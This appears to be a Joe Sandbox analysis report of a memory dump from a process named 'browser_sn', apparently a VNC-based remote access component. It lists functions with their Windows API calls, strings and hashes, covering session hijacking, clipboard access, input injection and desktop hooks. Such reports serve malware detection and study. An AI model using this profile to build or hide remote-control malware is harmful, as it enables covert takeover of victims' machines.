__doserrno.LIBCMT ref: 00007FF790CEA269
_errno.LIBCMT ref: 00007FF790CEA271
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CEA27C
_errno.LIBCMT ref: 00007FF790CEA29F
__doserrno.LIBCMT ref: 00007FF790CEA2AB
_getdrive.LIBCMT ref: 00007FF790CEA2D9
FindFirstFileExA.KERNEL32 ref: 00007FF790CEA2F8
_errno.LIBCMT ref: 00007FF790CEA326
_errno.LIBCMT ref: 00007FF790CEA32E
_errno.LIBCMT ref: 00007FF790CEA353
_errno.LIBCMT ref: 00007FF790CEA35D
_errno.LIBCMT ref: 00007FF790CEA36B
GetDriveTypeA.KERNEL32 ref: 00007FF790CEA447
free.LIBCMT ref: 00007FF790CEA45E
free.LIBCMT ref: 00007FF790CEA4B0
_errno.LIBCMT ref: 00007FF790CEA4B5
__doserrno.LIBCMT ref: 00007FF790CEA4C1
_wsopen_s.LIBCMT ref: 00007FF790CEA4FA
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF790CEA541
FileTimeToSystemTime.KERNEL32 ref: 00007FF790CEA559
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF790CEA5BC
FileTimeToSystemTime.KERNEL32 ref: 00007FF790CEA5D4
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF790CEA637
FileTimeToSystemTime.KERNEL32 ref: 00007FF790CEA64F
FindClose.KERNEL32 ref: 00007FF790CEA697
GetLastError.KERNEL32 ref: 00007FF790CEA6E4
FindClose.KERNEL32 ref: 00007FF790CEA6F4

Strings

./\, xrefs: 00007FF790CEA30E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
String ID: ./\
API String ID: 385398445-3176372042
Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
Instruction ID: 1dd954d9defc872407b6b4abb6ea6861bc22a2d74193815bf4174c271e22e9fa
Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
Instruction Fuzzy Hash: 2DE16F229282428AEB70AF31A0541BEF7A0FF46740F945035EA8E16B95DF7DF854DB20

Function 00007FF790C41D10 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 209libraryloadersleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C418A0: GetCurrentProcessId.KERNEL32 ref: 00007FF790C418B5
Part of subcall function 00007FF790C418A0: OpenProcess.KERNEL32 ref: 00007FF790C418C5

Part of subcall function 00007FF790C41640: GetVersionExA.KERNEL32 ref: 00007FF790C41671
Part of subcall function 00007FF790C41640: GetModuleFileNameA.KERNEL32 ref: 00007FF790C416B3
Part of subcall function 00007FF790C41640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C41767
Part of subcall function 00007FF790C41640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C41790
Part of subcall function 00007FF790C41640: GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C417CE

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00007FF790C41D85
CreateEnvironmentBlock.USERENV ref: 00007FF790C41DC8
SetLastError.KERNEL32 ref: 00007FF790C41DD8
CreateProcessAsUserA.ADVAPI32 ref: 00007FF790C41E2B
GetLastError.KERNEL32 ref: 00007FF790C41E40
GetLastError.KERNEL32 ref: 00007FF790C41E4B
LoadLibraryA.KERNEL32 ref: 00007FF790C41E87
LoadLibraryA.KERNEL32 ref: 00007FF790C41E97
GetProcAddress.KERNEL32 ref: 00007FF790C41EB5
GetProcAddress.KERNEL32 ref: 00007FF790C41ECD
Sleep.KERNEL32 ref: 00007FF790C41F0B
DestroyEnvironmentBlock.USERENV ref: 00007FF790C41F4C
SetLastError.KERNEL32 ref: 00007FF790C41F57
CreateProcessAsUserA.ADVAPI32 ref: 00007FF790C41FA2
GetLastError.KERNEL32 ref: 00007FF790C41FB7
GetLastError.KERNEL32 ref: 00007FF790C41FC2
LoadLibraryA.KERNEL32 ref: 00007FF790C41FFE
LoadLibraryA.KERNEL32 ref: 00007FF790C4200E
GetProcAddress.KERNEL32 ref: 00007FF790C4202C
GetProcAddress.KERNEL32 ref: 00007FF790C42044
Sleep.KERNEL32 ref: 00007FF790C42082
CloseHandle.KERNEL32 ref: 00007FF790C420B3

Strings

h, xrefs: 00007FF790C41D62
user32.dll, xrefs: 00007FF790C41E8D, 00007FF790C42004
Winsta0\Winlogon, xrefs: 00007FF790C41D46
LockWorkStation, xrefs: 00007FF790C41EC3, 00007FF790C4203A
WinStationConnectW, xrefs: 00007FF790C41EAB, 00007FF790C42022
winsta.dll, xrefs: 00007FF790C41E80, 00007FF790C41FF7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
API String ID: 2898369102-3720325205
Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Instruction ID: f5d72372207c9952d4b4e2a93cd216beb07ad18da24ac278315375dff91b968c
Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Instruction Fuzzy Hash: B5A1F535A2CA8286EA74AF75A8442B9F2B5FF89740FC45035D98D42B64DF3CF445CB20

Function 00007FF790C31DD0 Relevance: 45.3, APIs: 30, Instructions: 281clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF790C31E04
EmptyClipboard.USER32 ref: 00007FF790C31E1B
CloseClipboard.USER32 ref: 00007FF790C31E25

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseEmptyOpen
String ID:
API String ID: 1427272684-0
Opcode ID: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
Instruction ID: 7ebc4c1d0ef4e4fb3cbe61552d8e1420866920507687f4a0bde0b34395bd6cae
Opcode Fuzzy Hash: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
Instruction Fuzzy Hash: E3C13D31B29A029AEA34AF75A4541F9E3B5BF4AB84B845435CE0E477A5DF3CF404C360

Function 00007FF790C63460 Relevance: 44.1, APIs: 13, Strings: 12, Instructions: 369windowclipboardCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF790C6349B
DefWindowProcA.USER32 ref: 00007FF790C637AF
GetClipboardOwner.USER32 ref: 00007FF790C63809
EnterCriticalSection.KERNEL32 ref: 00007FF790C63848
LeaveCriticalSection.KERNEL32 ref: 00007FF790C63868
SendNotifyMessageA.USER32 ref: 00007FF790C63889
DefWindowProcA.USER32 ref: 00007FF790C638E5

Strings

vncdesktopsink.cpp : Monitor22 %i, xrefs: 00007FF790C63769
vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF790C63D03
vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF790C63CC1
vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF790C63C9D
vncdesktopsink.cpp : set SC hooks OK, xrefs: 00007FF790C63965
vncdesktopsink.cpp : Monitor3 %i %i, xrefs: 00007FF790C63789
vncdesktopsink.cpp : set hooks OK, xrefs: 00007FF790C63A60
vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF790C63D0C
vncdesktopsink.cpp : set W8 hooks OK, xrefs: 00007FF790C6392C
vncdesktopsink.cpp : Monitor222 %i, xrefs: 00007FF790C638A2
vncdesktopsink.cpp : failed to set system hooks, xrefs: 00007FF790C63A36
vncdesktopsink.cpp : Power3 %i %i, xrefs: 00007FF790C638C2

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 378279424-2704384803
Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
Instruction ID: e1219b2ebc8c02437e770caae0dc2dd33b3f58499d844d5c9fd66c0b74c1455b
Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
Instruction Fuzzy Hash: 07027026A28A8796FB78AB75D5446F8A7A0FF42B40F945536CA1E13391CF3CF454E320

Function 00007FF790C654A0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 301COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C65502
GetRegionData.GDI32 ref: 00007FF790C65632
GetRegionData.GDI32 ref: 00007FF790C65655
CreateRectRgn.GDI32 ref: 00007FF790C65691
GetRegionData.GDI32 ref: 00007FF790C656B9
LeaveCriticalSection.KERNEL32 ref: 00007FF790C65902

Strings

F, xrefs: 00007FF790C654F7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
String ID: F
API String ID: 2411647221-1304234792
Opcode ID: 14e9f32395c781ced201d7be751761d342cdd707439dce8d73d8fa27a21d3495
Instruction ID: b5dee7842b41b3ec95b376ef1d6583964b4e5703fc0a58c9ac2c4d946df2b823
Opcode Fuzzy Hash: 14e9f32395c781ced201d7be751761d342cdd707439dce8d73d8fa27a21d3495
Instruction Fuzzy Hash: EDC1A136728A8286E720EB36E4486A9B7A1FF89B84F945031DE4E83755DF3CF445C710

Function 00007FF790C56DD1 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 552filestringCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
GetLogicalDriveStringsA.KERNEL32 ref: 00007FF790C56DF7
GetDriveTypeA.KERNEL32 ref: 00007FF790C56E64
SHGetMalloc.SHELL32 ref: 00007FF790C5705C
SHGetSpecialFolderLocation.SHELL32 ref: 00007FF790C57072
SHGetPathFromIDListA.SHELL32 ref: 00007FF790C57087
SetErrorMode.KERNEL32 ref: 00007FF790C57131
FindFirstFileA.KERNEL32 ref: 00007FF790C57147
SetErrorMode.KERNEL32 ref: 00007FF790C57152
lstrlenA.KERNEL32 ref: 00007FF790C57288
FindNextFileA.KERNEL32 ref: 00007FF790C57346
FindClose.KERNEL32 ref: 00007FF790C5735A
LeaveCriticalSection.KERNEL32 ref: 00007FF790C57BAC

Strings

f, xrefs: 00007FF790C56E99
My Documents, xrefs: 00007FF790C56FED
vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
Network Favorites, xrefs: 00007FF790C57030
Desktop, xrefs: 00007FF790C57011
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2965397059-206656798
Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
Instruction ID: 64098686da53c037c5b382f943f8a7a8fe285a5b58f51a7e791b8a79a649b4d6
Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
Instruction Fuzzy Hash: 5C42BF26A2C68285EB70AB35C8583FD67A1EF86B98F840231DA1D477D5DF38F585C320

Function 00007FF790C54D7E Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 441COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
GetSystemMetrics.USER32 ref: 00007FF790C54E33
GetSystemMetrics.USER32 ref: 00007FF790C54EBE
mouse_event.USER32 ref: 00007FF790C54FBA
GetSystemMetrics.USER32 ref: 00007FF790C54FE7
GetSystemMetrics.USER32 ref: 00007FF790C5500B
GetSystemMetrics.USER32 ref: 00007FF790C55027
GetSystemMetrics.USER32 ref: 00007FF790C55046
GetCursorPos.USER32 ref: 00007FF790C550B1
SystemParametersInfoA.USER32 ref: 00007FF790C550D8
SystemParametersInfoA.USER32 ref: 00007FF790C550EA
SystemParametersInfoA.USER32 ref: 00007FF790C5510E
SystemParametersInfoA.USER32 ref: 00007FF790C55122
mouse_event.USER32 ref: 00007FF790C55149
SystemParametersInfoA.USER32 ref: 00007FF790C55163
SystemParametersInfoA.USER32 ref: 00007FF790C55175

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 246551654-3977938048
Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
Instruction ID: 0a262f3d156aa8e0512bf21dc76e19bd11db637f3938896a3da75f622e1adfc1
Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
Instruction Fuzzy Hash: 9D228936A1C6918AE764AB35C4587FEBBA1FF86B48F844135CA49477A4CF38E484C720

Function 00007FF790C48590 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 266threadlibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C485D3
GetProcAddress.KERNEL32 ref: 00007FF790C485EF
EnumDisplaySettingsA.USER32 ref: 00007FF790C4862B
EnumDisplaySettingsA.USER32 ref: 00007FF790C486BD
FreeLibrary.KERNEL32 ref: 00007FF790C4874B
GetCurrentThreadId.KERNEL32 ref: 00007FF790C488B9
GetThreadDesktop.USER32 ref: 00007FF790C488C1
OpenInputDesktop.USER32 ref: 00007FF790C488D9
SetThreadDesktop.USER32 ref: 00007FF790C488EA
ChangeDisplaySettingsExA.USER32 ref: 00007FF790C4890C
ChangeDisplaySettingsExA.USER32 ref: 00007FF790C48929
SetThreadDesktop.USER32 ref: 00007FF790C48939
CloseDesktop.USER32 ref: 00007FF790C48947
FreeLibrary.KERNEL32 ref: 00007FF790C48950
FreeLibrary.KERNEL32 ref: 00007FF790C48968

Strings

DEVICE0, xrefs: 00007FF790C487C8
mv2, xrefs: 00007FF790C48836
\DEVICE, xrefs: 00007FF790C4879A
mv video hook driver2, xrefs: 00007FF790C48724
, xrefs: 00007FF790C48846
USER32, xrefs: 00007FF790C485BC
EnumDisplayDevicesA, xrefs: 00007FF790C485E5

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 1729393483-4131161223
Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction ID: 006bc026d4bb4fc4799b4f0009bed937969a84e5d9772758e4384b0f143d6390
Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction Fuzzy Hash: D8B18C32A2968286FB70AB35A4502FDB7A2FF46794FD45035DA0D67B84DF3CE5098720

Function 00007FF790C47B90 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 227fileCOMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF790C47BFC
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF790C47C14
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32 ref: 00007FF790C47C2E
GetLastError.KERNEL32 ref: 00007FF790C47C36
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF790C47C63
SetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF790C47C82
CreateFileMappingA.KERNEL32 ref: 00007FF790C47E52
MapViewOfFile.KERNEL32 ref: 00007FF790C47E82
CreateEventA.KERNEL32 ref: 00007FF790C47EA4
CreateEventA.KERNEL32 ref: 00007FF790C47EC2
CreateFileMappingA.KERNEL32 ref: 00007FF790C47EF6
MapViewOfFile.KERNEL32 ref: 00007FF790C47F23
CreateEventA.KERNEL32 ref: 00007FF790C47F49
CreateEventA.KERNEL32 ref: 00007FF790C47F6B

Strings

event_IN_DONE, xrefs: 00007FF790C47DC2
fm_OUT, xrefs: 00007FF790C47D6E
fm_IN, xrefs: 00007FF790C47D48
event_OUT, xrefs: 00007FF790C47DEC
S:(ML;;NW;;;LW), xrefs: 00007FF790C47C24
event_OUT_DONE, xrefs: 00007FF790C47E16
Global\, xrefs: 00007FF790C47CA1, 00007FF790C47CBC, 00007FF790C47CD0, 00007FF790C47CEF, 00007FF790C47D03, 00007FF790C47D22
event_IN, xrefs: 00007FF790C47D98

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
